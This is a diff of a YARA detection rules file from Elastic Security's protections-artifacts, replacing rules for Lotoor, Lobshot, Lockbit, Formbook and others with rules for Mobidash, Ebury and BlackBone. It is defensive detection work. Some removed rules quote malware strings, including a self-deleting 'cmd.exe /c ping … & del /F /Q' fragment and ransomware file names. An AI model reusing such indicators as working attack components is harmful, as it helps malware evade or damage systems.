"https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L261-L279" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9fe78e4dd7975856a74d8dfd83e69793a769143e0fe6994cbc3ef28ea37d6cf8" - logic_hash = "4a7453342fd72dacb781919d3fac3bab02e7ef7c882d5938a2e0e1274c704705" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L61-L78" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8c91f85bc807605a3233d28a5eb8b6e1cf847fb288cbc4427e86226eed7a2055" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "2f6ad833b84f00be1d385de686a979d3738147c38b4126506e56225080ee81ef" + fingerprint = "a01f5ba8b3e8e82ff46cb748fd90a103009318a25f8532fb014722c96f0392db" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74242,28 +74688,28 @@ rule ELASTIC_Linux_Exploit_Lotoor_Dbc73Db0 : FILE MEMORY os = "linux" strings: - $a = { 63 75 73 3A 20 4C 69 6E 75 78 20 32 2E 36 2E 33 } + $a = { 89 C6 74 2E 89 44 24 0C 8B 44 24 24 C7 44 24 08 01 00 00 00 89 7C } condition: all of them } -rule ELASTIC_Linux_Exploit_Lotoor_Ec339160 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_601352Dc : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "ec339160-5f25-495c-8e48-4683ad2fcca0" - date = "2021-04-06" + id = "601352dc-13b6-4c3f-a013-c54a50e46820" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L281-L299" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "0002b469972f5c77a29e2a2719186059a3e96a6f4b1ef2d18a68fee3205ea0ba" - logic_hash = "9c1d1254093b172798024c42a6d78f5e6720d20b8c2a8ad4ca26c8e88e42f0e8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L80-L98" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5714e130075f4780e025fb3810f58a63e618659ac34d12abe211a1b6f2f80269" + logic_hash = "adeeea73b711fc867b88775c06a14011380118ed85691660ba771381e51160e3" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "24a3630fd49860104c60c4f4d0ef03bd17c124383a0b5d027a06c7ca6cb9cbba" + fingerprint = "acfca9259360641018d2bf9ba454fd5b65224361933557e007ab5cfb12186cd7" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74271,28 +74717,27 @@ rule ELASTIC_Linux_Exploit_Lotoor_Ec339160 : FILE MEMORY os = "linux" strings: - $a = { 69 75 6D 3A 20 4C 69 6E 75 78 20 32 2E 58 20 73 } + $a = { F6 74 14 48 8B BC 24 D0 00 00 00 48 8B 07 48 8B 80 B8 00 00 00 } condition: all of them } -rule ELASTIC_Linux_Exploit_Lotoor_7Cd57E18 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_Ddca1181 : FILE MEMORY { meta: - description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "7cd57e18-2315-419b-b373-ea801181232c" - date = "2021-04-06" + id = "ddca1181-91ca-4e5d-953f-be85838d3cb9" + date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Exploit_Lotoor.yar#L301-L319" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1eecf16dae302ae788d1bc81278139cd9f6af52d7bed48b8677b35ba5eb14e30" - logic_hash = "97604cdc9daa9993b9a18dc5df7ab105a5e6001129bcfcfeeb86640bee26f59d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L100-L117" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "076d4ac69f6bc29975b22e19d429c25ef357443ec8fcaf5165e0a8069112af74" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "a7d3183de1bccd816bcd2346e9754aaf6e7eb124d7416d79bdbe422b33035414" + fingerprint = "c8374ff2a85f90f153bcd2451109a65d3757eb7cef21abef69f7c6a4f214b051" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74300,67 +74745,57 @@ rule ELASTIC_Linux_Exploit_Lotoor_7Cd57E18 : FILE MEMORY os = "linux" strings: - $a = { 76 65 3A 20 4C 69 6E 75 78 20 32 2E 36 2E } + $a = { 84 C0 75 1E 8B 44 24 2C 89 7C 24 04 89 34 24 89 44 24 0C 8B 44 } condition: all of them } -rule ELASTIC_Windows_Trojan_Lobshot_013C1B0B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_65E666C0 : FILE MEMORY { meta: - description = "Detects Windows Trojan Lobshot (Windows.Trojan.Lobshot)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "013c1b0b-da18-4c09-ab18-5c8428a1f4dc" - date = "2023-04-18" - modified = "2023-04-23" - reference = "https://www.elastic.co/security-labs/elastic-security-labs-discovers-lobshot-malware" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Lobshot.yar#L1-L30" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e4ea88887753a936eaf3361dcc00380b88b0c210dcbde24f8f7ce27991856bf6" - logic_hash = "e1fb245c3441c9bd393a47a9bed01bf7f62aa3ec36d460584d75e326e7e92ad4" + id = "65e666c0-4eb7-4411-8743-053b6c0ec1d6" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L119-L137" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "19f9b5382d3e8e604be321aefd47cb72c2337a170403613b853307c266d065dd" + logic_hash = "2d2bec8f89986b19bf1c806b6654405ac6523f49aeafd759b7631d9587d780c8" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e39109421b3e156f814d33f1df327005f808f58f59bfe34ed6190076d7aace4b" + fingerprint = "92b7de293a7e368d0e92a6e2061e9277e7b285851322357808a04f8c203b20d0" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str0 = "HVNC Remote Control" ascii fullword - $str1 = " Error # %d - %08lx" ascii fullword - $str2 = "Set clipboard text failed." ascii fullword - $str3 = "OK %08lx %08lx %d" ascii fullword - $str4 = "\") & (rundll32.exe \"" wide fullword - $str5 = "%LOCALAPPDATA%\\svc.db" wide fullword - $str6 = "cmd.exe /c (ping -n 10 127.0.0.1) & (del /F /Q \"" wide fullword - $seq_str_decrypt = { 8A 5A ?? 8D 52 ?? 80 EB ?? 85 FF 74 ?? C0 E0 ?? 2C ?? 0A C3 32 C1 32 C7 88 06 32 E8 83 C6 ?? 83 C5 ?? EB ?? } - $seq_emu_check = { 8B 35 ?? ?? ?? ?? 8D 44 24 ?? 50 8D 44 24 ?? C7 44 24 ?? 48 41 4C 39 50 C7 44 24 ?? 54 48 00 00 FF D6 } - $seq_enum_xor = { FF 15 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 83 7C 24 ?? 00 0F 84 ?? ?? ?? ?? 8B 4C 24 ?? 68 07 80 00 00 8B 41 ?? 8A 00 32 01 A2 ?? ?? ?? ?? } - $seq_create_guid = { 8D 48 ?? 80 F9 ?? 77 ?? 2C ?? C1 E2 ?? 46 0F B6 C8 0B D1 83 FE ?? 7C ?? 5F 8B C2 5E C3 } + $a = { 4C 8B 44 24 08 48 89 DF 48 8B 14 24 48 8D 64 24 18 5B 4C 89 E6 48 } condition: - 2 of ($seq*) or 5 of ($str*) + all of them } -rule ELASTIC_Linux_Trojan_Dinodasrat_1D371D10 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_494D5B0F : FILE MEMORY { meta: - description = "Detects Linux Trojan Dinodasrat (Linux.Trojan.DinodasRAT)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "1d371d10-b2ae-4ea0-ad37-f5a5a571a6fc" - date = "2024-04-02" - modified = "2024-06-12" + id = "494d5b0f-09c7-4fcb-90e9-1efc57c45082" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_DinodasRAT.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bf830191215e0c8db207ea320d8e795990cf6b3e6698932e6e0c9c0588fc9eff" - logic_hash = "933e78882be1d8dd9553ba90f038963d1b6f8f643888258541b7668aa3434808" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L139-L157" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7e08df5279f4d22f1f27553946b0dadd60bb8242d522a8dceb45ab7636433c2f" + logic_hash = "6ddb94f9f44fe749a442592d491343a99bd870ea2d79596631d857516425e72b" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a53bf582ad95320dd6f432cb7290ce604aa558e4ecf6ae4e11d7985183969db1" + fingerprint = "e3316257592dc9654a5e63cf33c862ea1298af7a893e9175e1a15c7aaa595f6a" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74368,33 +74803,28 @@ rule ELASTIC_Linux_Trojan_Dinodasrat_1D371D10 : FILE MEMORY os = "linux" strings: - $s1 = "int MyShell::createsh()" - $s2 = "/src/myshell.cpp" - $s3 = "/src/inifile.cpp" - $s4 = "Linux_%s_%s_%u_V" - $s5 = "/home/soft/mm/rootkit/" - $s6 = "IniFile::load_ini_file" + $a = { 00 18 00 00 00 40 04 00 00 01 5B 00 00 00 3A 00 00 00 54 04 00 00 05 A1 00 } condition: - 4 of them + all of them } -rule ELASTIC_Linux_Ransomware_Lockbit_D248E80E : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_Bb4F7F39 : FILE MEMORY { meta: - description = "Detects Linux Ransomware Lockbit (Linux.Ransomware.Lockbit)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "d248e80e-3e2f-4957-adc3-0c912b0cd386" - date = "2023-07-27" - modified = "2024-02-13" + id = "bb4f7f39-1f1c-4a2d-a480-3e1d2b6967b7" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Lockbit.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4800a67ceff340d2ab4f79406a01f58e5a97d589b29b35394b2a82a299b19745" - logic_hash = "5d33d243cd7f9d9189139eb34a4dd8d81882be200223d5c8e60dfd07ca98f94b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L159-L177" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6694640e7df5308a969ef40f86393a65febe51639069cb7eaa5650f62c1f4083" + logic_hash = "33e8fcbb29cc38b4a8365845eb3a1488e13be964f7383b28a158a98fb259acb4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "417ecf5a0b6030ed5b973186efa1e72dfa56886ba6cfc5fbf615e0814c24992f" + fingerprint = "b7e96ff17a19ffcbfc87cdba3f86216271ff01c460ff7564f6af6b40c21a530b" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74402,33 +74832,27 @@ rule ELASTIC_Linux_Ransomware_Lockbit_D248E80E : FILE MEMORY os = "linux" strings: - $a1 = "restore-my-files.txt" fullword - $b1 = "xkeyboard-config" fullword - $b2 = "bootsect.bak" fullword - $b3 = "lockbit" fullword - $b4 = "Error: %s" fullword - $b5 = "crypto_generichash_blake2b_final" fullword + $a = { 75 1F 48 8D 64 24 08 48 89 DF 5B 48 89 EA 4C 89 E1 4C 89 EE 5D } condition: - $a1 and 2 of ($b*) + all of them } -rule ELASTIC_Linux_Ransomware_Lockbit_5B30A04B : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_8679E1Cb : FILE MEMORY { meta: - description = "Detects Linux Ransomware Lockbit (Linux.Ransomware.Lockbit)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "5b30a04b-d618-4698-a797-30bf6d4a001c" - date = "2023-07-29" - modified = "2024-02-13" + id = "8679e1cb-407e-4554-8ef5-ece5110735c6" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_Lockbit.yar#L26-L46" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "41cbb7d79388eaa4d6e704bd4a8bf8f34d486d27277001c343ea3ce112f4fb0d" - logic_hash = "b89d0f25f08ffa35e075def6a29cf52a80500c6499732146426a71c741059a3b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L179-L196" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "6055ac4800397f6582e60cdf15fa74584986e1e7cf49a541b0ec746445834819" score = 75 - quality = 69 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "99bf6afb1554ec3b3b82389c93ca87018c51f7a80270d64007a5f5fc59715c45" + fingerprint = "7e517bf9e036410acf696c85bd39c720234b64aab8c5b329920a64f910c72c92" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74436,122 +74860,114 @@ rule ELASTIC_Linux_Ransomware_Lockbit_5B30A04B : FILE MEMORY os = "linux" strings: - $a1 = { 5D 50 4A 49 55 58 40 77 58 54 5C } - $a2 = { 33 6B 5C 5A 4C 4B 4A 50 4F 5C 55 40 } - $a3 = { 5E 4C 58 4B 58 57 4D 5C 5C 5D } + $a = { 24 1C 89 F0 5B 5E 5F 5D C3 8D 76 00 8B 44 24 34 83 C6 01 8D 7C } condition: all of them } -rule ELASTIC_Windows_Trojan_Formbook_1112E116 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_29B86E6A : FILE MEMORY { meta: - description = "Detects Windows Trojan Formbook (Windows.Trojan.Formbook)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "1112e116-dee0-4818-a41f-ca5c1c41b4b8" - date = "2021-06-14" - modified = "2021-08-23" - reference = "https://www.elastic.co/security-labs/formbook-adopts-cab-less-approach" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Formbook.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a" - logic_hash = "ec307a8681fa01fc0c7c0579b0e3eff10e7f373159ad58dae0a358ff16fbc10b" + id = "29b86e6a-fcad-49ac-ae78-ce28987f7363" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L198-L215" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "dd5f44249cc4c91f39a0e7d0b236ebeed8f78d5fcb03c7ebc80ef1c738b18336" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134" + fingerprint = "5d7d930f39e435fc22921571fe96db912eed79ec630d4ed60da6f007073b7362" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 3C 30 50 4F 53 54 74 09 40 } - $a2 = { 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 } - $a3 = { 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 } - $a4 = { 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 } + $a = { 2E 10 73 2E 10 02 47 2E 10 56 2E 10 5C 2E 10 4E 2E 10 49 2E 10 } condition: - any of them + all of them } -rule ELASTIC_Windows_Trojan_Formbook_772Cc62D : FILE MEMORY +rule ELASTIC_Linux_Trojan_Mobidash_E3086563 : FILE MEMORY { meta: - description = "Detects Windows Trojan Formbook (Windows.Trojan.Formbook)" + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" author = "Elastic Security" - id = "772cc62d-345c-42d8-97ab-f67e447ddca4" - date = "2022-05-23" - modified = "2022-07-18" - reference = "https://www.elastic.co/security-labs/formbook-adopts-cab-less-approach" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Formbook.yar#L25-L46" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "db9ab8df029856fc1c210499ed8e1b92c9722f7aa2264363670c47b51ec8fa83" + id = "e3086563-346d-43f1-89eb-42693dc17195" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L217-L235" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6694640e7df5308a969ef40f86393a65febe51639069cb7eaa5650f62c1f4083" + logic_hash = "5545f7ce8fa45dc56bc4bb5140ce1db527997dfaa1dd2bbb1e4a12af45300065" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "3d732c989df085aefa1a93b38a3c078f9f0c3ee214292f6c1e31a9fc1c9ae50e" + fingerprint = "8fc223f3850994479a70358da66fb31b610e00c9cbc3a94fd7323780383d738e" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko" - $a2 = "signin" - $a3 = "persistent" - $r1 = /.\:\\Users\\[^\\]{1,50}\\AppData\\Roaming\\[a-zA-Z0-9]{8}\\[a-zA-Z0-9]{3}log\.ini/ wide + $a = { 24 48 8B 4C 24 08 49 8B 55 00 48 39 D1 75 16 48 8D 64 24 10 } condition: - 2 of ($a*) and $r1 + all of them } -rule ELASTIC_Windows_Trojan_Formbook_5799D1F2 : FILE MEMORY -{ - meta: - description = "Detects Windows Trojan Formbook (Windows.Trojan.Formbook)" - author = "Elastic Security" - id = "5799d1f2-4d4f-49d6-b010-67d2fbc04824" - date = "2022-06-08" - modified = "2022-09-29" - reference = "https://www.elastic.co/security-labs/formbook-adopts-cab-less-approach" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Formbook.yar#L48-L67" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "8555a6d313cb17f958fc2e08d6c042aaff9ceda967f8598ac65ab6333d14efd9" - logic_hash = "8e61eabd11beb9fb35c016983cfb3085f5ceddfc8268522f3b48d20be5b5df6a" +rule ELASTIC_Linux_Trojan_Mobidash_2F114992 : FILE MEMORY +{ + meta: + description = "Detects Linux Trojan Mobidash (Linux.Trojan.Mobidash)" + author = "Elastic Security" + id = "2f114992-36a7-430c-8bd9-5661814d95a8" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Mobidash.yar#L237-L255" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "6694640e7df5308a969ef40f86393a65febe51639069cb7eaa5650f62c1f4083" + logic_hash = "f93fe72e08c8ec135cccc8cdab2ecedbb694e9ad39f2572d060864bb3290e25c" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b262c4223e90c539c73831f7f833d25fe938eaecb77ca6d2e93add6f93e7d75d" + fingerprint = "2371fc5ba1e279a77496328d3a39342408609f04f1a8947e84e734d28d874416" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a = { E9 C5 9C FF FF C3 E8 00 00 00 00 58 C3 68 } + $a = { DF 4C 89 F6 48 8B 80 B8 00 00 00 48 8D 64 24 58 5B 5D 41 5C } condition: all of them } -rule ELASTIC_Linux_Trojan_Ganiw_99349371 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Pornoasset_927F314F : FILE MEMORY { meta: - description = "Detects Linux Trojan Ganiw (Linux.Trojan.Ganiw)" + description = "Detects Linux Trojan Pornoasset (Linux.Trojan.Pornoasset)" author = "Elastic Security" - id = "99349371-644e-4954-9b7d-f2f579922565" + id = "927f314f-2cbb-4f87-b75c-9aa5ef758599" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ganiw.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e8dbb246fdd1a50226a36c407ac90eb44b0cf5e92bf0b92c89218f474f9c2afb" - logic_hash = "26160e855c63fc0b73e415de2fe058f2005df1ec5544d21865d022c5474df30c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Pornoasset.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d653598df857535c354ba21d96358d4767d6ada137ee32ce5eb4972363b35f93" + logic_hash = "7267375346c1628e04c8272c24bde04a5d6ae2b420f64dfe58657cfc3eecc0e7" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "6b0cbea419915567c2ecd84bfcb2c7f7301435ee953f16c6dcba826802637551" + fingerprint = "7214d3132fc606482e3f6236d291082a3abc0359c80255048045dba6e60ec7bf" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74559,27 +74975,27 @@ rule ELASTIC_Linux_Trojan_Ganiw_99349371 : FILE MEMORY os = "linux" strings: - $a = { 10 66 89 43 02 8B 5D FC C9 C3 55 89 E5 53 83 EC 04 8B 45 14 8B } + $a = { C3 D3 CB D3 C3 48 31 C3 48 0F AF F0 48 0F AF F0 48 0F AF F0 48 } condition: all of them } -rule ELASTIC_Linux_Trojan_Ganiw_B9F045Aa : FILE MEMORY +rule ELASTIC_Linux_Trojan_Ebury_7B13E9B6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Ganiw (Linux.Trojan.Ganiw)" + description = "Detects Linux Trojan Ebury (Linux.Trojan.Ebury)" author = "Elastic Security" - id = "b9f045aa-99fa-47e9-b179-ac62158b3fe2" + id = "7b13e9b6-ce96-4bd3-8196-83420280bd1f" date = "2021-01-12" modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Trojan_Ganiw.yar#L21-L38" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - logic_hash = "2565101b261bee22ddecf6898ff0ac8a114d09c822d8db26ba3e3571ebe06b12" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Ebury.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "30d126ffc5b782236663c23734f1eef21e1cc929d549a37bba8e1e7b41321111" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "0aaec92ca1c622df848bba80a2f1e4646252625d58e28269965b13d65158f238" + fingerprint = "a891724ce36e86637540f722bc13b44984771f709219976168f12fe782f08306" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -74587,93 +75003,92 @@ rule ELASTIC_Linux_Trojan_Ganiw_B9F045Aa : FILE MEMORY os = "linux" strings: - $a = { E5 57 8B 55 0C 85 D2 74 21 FC 31 C0 8B 7D 08 AB AB AB AB AB AB } + $a = { 8B 44 24 10 4C 8B 54 24 18 4C 8B 5C 24 20 8B 5C 24 28 74 04 } condition: all of them } -rule ELASTIC_Windows_Trojan_Onlylogger_B9E88336 : FILE MEMORY +rule ELASTIC_Windows_Hacktool_Blackbone_2Ff5Ec38 : FILE { meta: - description = "Detects Windows Trojan Onlylogger (Windows.Trojan.OnlyLogger)" + description = "Detects Windows Hacktool Blackbone (Windows.Hacktool.BlackBone)" author = "Elastic Security" - id = "b9e88336-9719-4f43-afc9-b0e6c7d72b6f" - date = "2022-03-22" - modified = "2022-04-12" + id = "2ff5ec38-ce35-432a-8ffa-d459f84438dd" + date = "2022-04-04" + modified = "2022-04-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_OnlyLogger.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "69876ee4d89ba68ee86f1a4eaf0a7cb51a012752e14c952a177cd5ffd8190986" - logic_hash = "b8d1c4c1e33fc0b54a62f82b8f53c9a1b051ad8c2f578d2a43f504158d1d9247" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Hacktool_BlackBone.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "4e3887f950bff034efedd40f1e949579854a24140128246fa6141f2c34de6017" + logic_hash = "0c32bd04460cdf7a56664253992a684c2c684b15ac9ca853b27ab24f07f71607" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "5c8c98b250252d178c8dbad60bf398489d9396968e33b3e004219a4f323eeed8" - severity = 100 + tags = "FILE" + fingerprint = "e3df60931c040081214296f006d98e155a5dc7e285a840a1decb23186ef67465" + severity = 50 arch_context = "x86" - scan_context = "file, memory" + scan_context = "file" license = "Elastic License v2" os = "windows" strings: - $a1 = 